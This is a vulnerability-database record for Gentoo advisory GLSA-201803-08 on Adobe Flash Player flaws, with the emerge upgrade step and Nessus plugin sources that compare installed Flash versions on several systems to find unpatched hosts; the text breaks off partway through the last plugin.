{"description": "### Background\n\nThe Adobe Flash Player is a renderer for the SWF file format, which is commonly used to provide interactive websites. \n\n### Description\n\nMultiple vulnerabilities have been discovered in Adobe Flash Player. Please review the CVE identifiers referenced below for details. \n\n### Impact\n\nA remote attacker could possibly execute arbitrary code with the privileges of the process or bypass security restrictions. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll Adobe Flash Player users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose\n \">=www-plugins/adobe-flash-29.0.0.113\"", "affectedPackage": [{"OSVersion": "any", "OS": "Gentoo", "arch": "all", "operator": "lt", "packageFilename": "UNKNOWN", "packageName": "www-plugins/adobe-flash", "packageVersion": "29.0.0.113"}], "reporter": "Gentoo Foundation", "href": "https://security.gentoo.org/glsa/201803-08", "type": "gentoo", "viewCount": 71, "references": ["https://nvd.nist.gov/vuln/detail/CVE-2018-4919", "https://bugs.gentoo.org/show_bug.cgi?id=646724", "https://nvd.nist.gov/vuln/detail/CVE-2018-4878", "https://nvd.nist.gov/vuln/detail/CVE-2018-4920", "https://bugs.gentoo.org/show_bug.cgi?id=650424", "https://nvd.nist.gov/vuln/detail/CVE-2018-4877", "https://nvd.nist.gov/vuln/detail/CVE-2018-4871"], "lastseen": "2018-03-19T05:26:19", "published": "2018-03-19T00:00:00", "cvelist": ["CVE-2018-4878", "CVE-2018-4871", "CVE-2018-4920", "CVE-2018-4919", "CVE-2018-4877"], "id": "GLSA-201803-08", "modified": "2018-03-19T00:00:00", "title": "Adobe Flash Player: Multiple vulnerabilities", "edition": 1, "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "bulletinFamily": "unix", "enchantments": {"score": {"value": 7.8, "vector": "NONE", "modified": "2018-03-19T05:26:19", "rev": 2}, "dependencies": {"references": [{"type": "nessus", "idList": ["SMB_NT_MS18_MAR_4088785.NASL", "FLASH_PLAYER_APSB18-05.NASL", "MACOSX_FLASH_PLAYER_APSA18-01.NASL", "MACOSX_FLASH_PLAYER_APSB18-05.NASL", "FREEBSD_PKG_756A86310B8411E8A9866451062F0F7A.NASL", "REDHAT-RHSA-2018-0285.NASL", "FLASH_PLAYER_APSA18-01.NASL", "REDHAT-RHSA-2018-0520.NASL", "FREEBSD_PKG_313078E326E211E899206451062F0F7A.NASL", "GENTOO_GLSA-201803-08.NASL"]}, {"type": "cve", "idList": ["CVE-2018-4920", "CVE-2018-4878", "CVE-2018-4871", "CVE-2018-4877", "CVE-2018-4919"]}, {"type": "attackerkb", "idList": ["AKB:41DF47B0-8F5D-477F-9F42-AB76A33252AD"]}, {"type": "symantec", "idList": ["SMNTC-102893", "SMNTC-103383", "SMNTC-103385", "SMNTC-102930"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310812684", "OPENVAS:1361412562310813029", "OPENVAS:1361412562310813027", "OPENVAS:1361412562310812685", "OPENVAS:1361412562310813024", "OPENVAS:1361412562310813030", "OPENVAS:1361412562310813026", "OPENVAS:1361412562310812689", "OPENVAS:1361412562310813028", "OPENVAS:1361412562310813025"]}, {"type": "redhat", "idList": ["RHSA-2018:0285", "RHSA-2018:0081", "RHSA-2018:0520"]}, {"type": "freebsd", "idList": ["313078E3-26E2-11E8-9920-6451062F0F7A", "756A8631-0B84-11E8-A986-6451062F0F7A", "9C016563-F582-11E7-B33C-6451062F0F7A"]}, {"type": "kaspersky", "idList": ["KLA11191", "KLA11171", "KLA11208"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:0B24CF652B6ADAB5E1BE333A26A02E21", "TRENDMICROBLOG:611E1E590AEA0D73DBB760324065E09C", "TRENDMICROBLOG:08ADD009C78AC2B7B49C47D2673AD447", "TRENDMICROBLOG:D07F262A5F92BE131EF59AA1DD863465"]}, {"type": "seebug", "idList": ["SSV:97136"]}, {"type": "fireeye", "idList": ["FIREEYE:96525D6EA5DBF734A371FB66EB02FA45", "FIREEYE:0D4F2E1284C786ABA6A50D8BE7E34E6E"]}, {"type": "myhack58", "idList": ["MYHACK58:62201889929", "MYHACK58:62201891130"]}, {"type": "threatpost", "idList": ["THREATPOST:BC14FD8D22AC2C22C164C5B8B0E36C05", "THREATPOST:EA5D6454E04EAFE2D10FDC5BD6D23F81", "THREATPOST:E1C629434DE943EAA7BD57B1F6EEA7E2"]}, {"type": "zdi", "idList": ["ZDI-18-124", "ZDI-18-178"]}, {"type": "zdt", "idList": ["1337DAY-ID-30431", "1337DAY-ID-30119", "1337DAY-ID-30432"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:D16BF29892ADBD1FE8B1E6E0A3DED407", "EXPLOITPACK:6891CF27FFF72B8EB68CEFB56D149FC3", "EXPLOITPACK:3AE76F8EB91746556D3EB11E9FF64F66"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:147041"]}, {"type": "krebs", "idList": ["KREBS:E2D2D085D282D0D49FB14A33098B68DE"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:EA93E4D6EB6BD6A0F2388E0DF2AE2D16", "MALWAREBYTES:CCB1B1B23474798BB372D709A6E97F86", "MALWAREBYTES:E0E596B13A84774F12BFB5962B091DCE", "MALWAREBYTES:06D9BFC6DC339FACFCE028EB1C5A79EF", "MALWAREBYTES:30BC856501B7BB42655FA3109FACCA26", "MALWAREBYTES:4232991FEE4DC3F0CD04D068FBB82A1C", "MALWAREBYTES:F79B9F46F986F9BDA455EEBF8E2CA464", "MALWAREBYTES:C982F670DC06D05621493C9E9A1E0E14", "MALWAREBYTES:1EF2E06811A91F2948F835D21FF698ED", "MALWAREBYTES:026284ECC22DB2D1F343F9B66686DEF9"]}, {"type": "thn", "idList": ["THN:3BC4F7FE3170D82B2C8328638552D1D3"]}, {"type": "talosblog", "idList": ["TALOSBLOG:B69F0136CDE2A78382370469FF70F7DB"]}, {"type": "exploitdb", "idList": ["EDB-ID:44745", "EDB-ID:44744", "EDB-ID:44412"]}], "modified": "2018-03-19T05:26:19", "rev": 2}, "vulnersScore": 7.8}}
{"nessus": [{"lastseen": "2021-03-01T03:10:17", "description": "The remote host is affected by the vulnerability described in GLSA-201803-08\n(Adobe Flash Player: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in Adobe Flash Player.\n Please review the CVE identifiers referenced below for details.\n \nImpact :\n\n A remote attacker could possibly execute arbitrary code with the\n privileges of the process or bypass security restrictions.\n \nWorkaround :\n\n There is no known workaround at this time.", "edition": 25, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-03-19T00:00:00", "title": "GLSA-201803-08 : Adobe Flash Player: Multiple vulnerabilities (Underminer)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-4878", "CVE-2018-4871", "CVE-2018-4920", "CVE-2018-4919", "CVE-2018-4877"], "modified": "2021-03-02T00:00:00", "cpe": ["cpe:/o:gentoo:linux", "p-cpe:/a:gentoo:linux:adobe-flash"], "id": "GENTOO_GLSA-201803-08.NASL", "href": "https://www.tenable.com/plugins/nessus/108434", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201803-08.\n#\n# The advisory text is Copyright (C) 2001-2018 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(108434);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2019/04/05 23:25:06\");\n\n script_cve_id(\"CVE-2018-4871\", \"CVE-2018-4877\", \"CVE-2018-4878\", \"CVE-2018-4919\", \"CVE-2018-4920\");\n script_xref(name:\"GLSA\", value:\"201803-08\");\n\n script_name(english:\"GLSA-201803-08 : Adobe Flash Player: Multiple vulnerabilities (Underminer)\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-201803-08\n(Adobe Flash Player: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in Adobe Flash Player.\n Please review the CVE identifiers referenced below for details.\n \nImpact :\n\n A remote attacker could possibly execute arbitrary code with the\n privileges of the process or bypass security restrictions.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201803-08\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All Adobe Flash Player users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose\n '>=www-plugins/adobe-flash-29.0.0.113'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:adobe-flash\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/03/19\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/03/19\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"www-plugins/adobe-flash\", unaffected:make_list(\"ge 29.0.0.113\"), vulnerable:make_list(\"lt 29.0.0.113\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Adobe Flash Player\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-03-01T02:47:37", "description": "The version of Adobe Flash Player installed on the remote Windows\nhost is equal or prior to version 28.0.0.161. It is therefore \naffected by multiple vulnerabilities.", "edition": 27, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-03-13T00:00:00", "title": "Adobe Flash Player <= 28.0.0.161 (APSB18-05)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-4920", "CVE-2018-4919"], "modified": "2021-03-02T00:00:00", "cpe": ["cpe:/a:adobe:flash_player"], "id": "FLASH_PLAYER_APSB18-05.NASL", "href": "https://www.tenable.com/plugins/nessus/108281", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(108281);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2019/11/08\");\n\n script_cve_id(\"CVE-2018-4919\", \"CVE-2018-4920\");\n\n script_name(english:\"Adobe Flash Player <= 28.0.0.161 (APSB18-05)\");\n script_summary(english:\"Checks the version of the ActiveX control.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host has a browser plugin installed that is\naffected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Adobe Flash Player installed on the remote Windows\nhost is equal or prior to version 28.0.0.161. It is therefore \naffected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb18-05.html\");\n # http://helpx.adobe.com/flash-player/kb/archived-flash-player-versions.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?0cb17c10\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Adobe Flash Player version 29.0.0.113 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-4920\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/03/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/03/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/03/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:flash_player\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"flash_player_installed.nasl\");\n script_require_keys(\"SMB/Flash_Player/installed\");\n\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/Flash_Player/installed\");\n\n# Identify vulnerable versions.\ninfo = \"\";\nvariants = make_list(\n \"Plugin\",\n \"ActiveX\",\n \"Chrome\",\n \"Chrome_Pepper\"\n);\n\n# we're checking for versions less than *or equal to* the cutoff!\nforeach variant (variants)\n{\n vers = get_kb_list(\"SMB/Flash_Player/\"+variant+\"/Version/*\");\n files = get_kb_list(\"SMB/Flash_Player/\"+variant+\"/File/*\");\n\n if (isnull(vers) || isnull(files))\n continue;\n\n foreach key (keys(vers))\n {\n ver = vers[key];\n if (isnull(ver))\n continue;\n\n # <= 28.0.0.161\n if (ver_compare(ver:ver,fix:\"28.0.0.161\",strict:FALSE) <= 0)\n {\n num = key - (\"SMB/Flash_Player/\"+variant+\"/Version/\");\n file = files[\"SMB/Flash_Player/\"+variant+\"/File/\"+num];\n if (variant == \"Plugin\")\n {\n info += '\\n Product : Browser Plugin (for Firefox / Netscape / Opera)';\n fix = \"29.0.0.113\";\n }\n else if (variant == \"ActiveX\")\n {\n info += '\\n Product : ActiveX control (for Internet Explorer)';\n fix = \"29.0.0.113\";\n }\n else if (\"Chrome\" >< variant)\n {\n info += '\\n Product : Browser Plugin (for Google Chrome)';\n if (variant == \"Chrome\")\n fix = \"Upgrade to a version of Google Chrome running Flash Player 29.0.0.113\";\n }\n info += '\\n Path : ' + file +\n '\\n Installed version : ' + ver;\n if (variant == \"Chrome_Pepper\")\n info += '\\n Fixed version : 29.0.0.113 (Chrome PepperFlash)';\n else if (!isnull(fix))\n info += '\\n Fixed version : '+fix;\n info += '\\n';\n }\n }\n}\n\nif (info)\n{\n port = get_kb_item(\"SMB/transport\");\n if (!port) port = 445;\n\n if (report_verbosity > 0) security_hole(port:port, extra:info);\n else security_hole(port);\n}\nelse\n{\n if (thorough_tests)\n exit(0, 'No vulnerable versions of Adobe Flash Player were found.');\n else\n exit(1, 'Google Chrome\\'s built-in Flash Player may not have been detected because the \\'Perform thorough tests\\' setting was not enabled.');\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-03-01T03:48:12", "description": "The version of Adobe Flash Player installed on the remote macOS or Mac\nOS X host is equal or prior to version 28.0.0.161.\nIt is therefore affected by multiple vulnerabilities.", "edition": 27, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-03-13T00:00:00", "title": "Adobe Flash Player for Mac <= 28.0.0.161 (APSB18-05)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-4920", "CVE-2018-4919"], "modified": "2021-03-02T00:00:00", "cpe": ["cpe:/a:adobe:flash_player"], "id": "MACOSX_FLASH_PLAYER_APSB18-05.NASL", "href": "https://www.tenable.com/plugins/nessus/108283", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(108283);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2019/11/08\");\n\n script_cve_id(\"CVE-2018-4919\", \"CVE-2018-4920\");\n\n script_name(english:\"Adobe Flash Player for Mac <= 28.0.0.161 (APSB18-05)\");\n script_summary(english:\"Checks the version of the ActiveX control.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote macOS or Mac OSX host has a browser plugin installed that is\naffected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Adobe Flash Player installed on the remote macOS or Mac\nOS X host is equal or prior to version 28.0.0.161.\nIt is therefore affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb18-05.html\");\n # http://helpx.adobe.com/flash-player/kb/archived-flash-player-versions.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?0cb17c10\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Adobe Flash Player version 29.0.0.113 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-4920\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/03/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/03/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/03/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:flash_player\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"macosx_flash_player_installed.nasl\");\n script_require_keys(\"MacOSX/Flash_Player/Version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nversion = get_kb_item_or_exit(\"MacOSX/Flash_Player/Version\");\npath = get_kb_item_or_exit(\"MacOSX/Flash_Player/Path\");\n\ncutoff_version = \"28.0.0.161\";\nfix = \"29.0.0.113\";\n# We're checking for versions less than or equal to the cutoff!\nif (ver_compare(ver:version, fix:cutoff_version, strict:FALSE) <= 0)\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n Path : ' + path +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fix +\n '\\n';\n security_hole(port:0, extra:report);\n }\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_INST_PATH_NOT_VULN, \"Flash Player for Mac\", version, path);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-03-01T02:49:54", "description": "Adobe reports :\n\n- This update resolves a use-after-free vulnerability that could lead\nto remote code execution (CVE-2018-4919).\n\n- This update resolves a type confusion vulnerability that could lead\nto remote code execution (CVE-2018-4920).", "edition": 26, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-03-14T00:00:00", "title": "FreeBSD : Flash Player -- multiple vulnerabilities (313078e3-26e2-11e8-9920-6451062f0f7a)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-4920", "CVE-2018-4919"], "modified": "2021-03-02T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:linux-flashplayer", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_313078E326E211E899206451062F0F7A.NASL", "href": "https://www.tenable.com/plugins/nessus/108314", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(108314);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2018/11/10 11:49:46\");\n\n script_cve_id(\"CVE-2018-4919\", \"CVE-2018-4920\");\n\n script_name(english:\"FreeBSD : Flash Player -- multiple vulnerabilities (313078e3-26e2-11e8-9920-6451062f0f7a)\");\n script_summary(english:\"Checks for updated package in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote FreeBSD host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Adobe reports :\n\n- This update resolves a use-after-free vulnerability that could lead\nto remote code execution (CVE-2018-4919).\n\n- This update resolves a type confusion vulnerability that could lead\nto remote code execution (CVE-2018-4920).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://helpx.adobe.com/security/products/flash-player/apsb18-05.html\"\n );\n # https://vuxml.freebsd.org/freebsd/313078e3-26e2-11e8-9920-6451062f0f7a.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?f0ef0bb8\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:linux-flashplayer\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/03/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/03/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/03/14\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"linux-flashplayer<29.0.0.113\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-03-01T06:20:48", "description": "The remote Windows host is missing security update KB4088785. It is,\ntherefore, affected by multiple remote code execution vulnerabilities\nin Adobe Flash Player.", "edition": 30, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-03-13T00:00:00", "title": "KB4088785: Security update for Adobe Flash Player (March 2018)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-4920", "CVE-2018-4919"], "modified": "2021-03-02T00:00:00", "cpe": ["cpe:/a:adobe:flash_player"], "id": "SMB_NT_MS18_MAR_4088785.NASL", "href": "https://www.tenable.com/plugins/nessus/108287", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(108287);\n script_version(\"1.10\");\n script_cvs_date(\"Date: 2019/11/08\");\n\n script_cve_id(\"CVE-2018-4919\", \"CVE-2018-4920\");\n script_bugtraq_id(103383, 103385);\n script_xref(name:\"MSKB\", value:\"4088785\");\n script_xref(name:\"MSFT\", value:\"MS18-4088785\");\n\n script_name(english:\"KB4088785: Security update for Adobe Flash Player (March 2018)\");\n script_summary(english:\"Checks the version of the ActiveX control.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host has a browser plugin installed that is\naffected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update KB4088785. It is,\ntherefore, affected by multiple remote code execution vulnerabilities\nin Adobe Flash Player.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb18-05.html\");\n # https://support.microsoft.com/en-us/help/4088785/security-update-for-adobe-flash-player\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?277368d9\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released KB4088785 to address this issue.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-4920\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/03/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/03/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/03/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:flash_player\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n 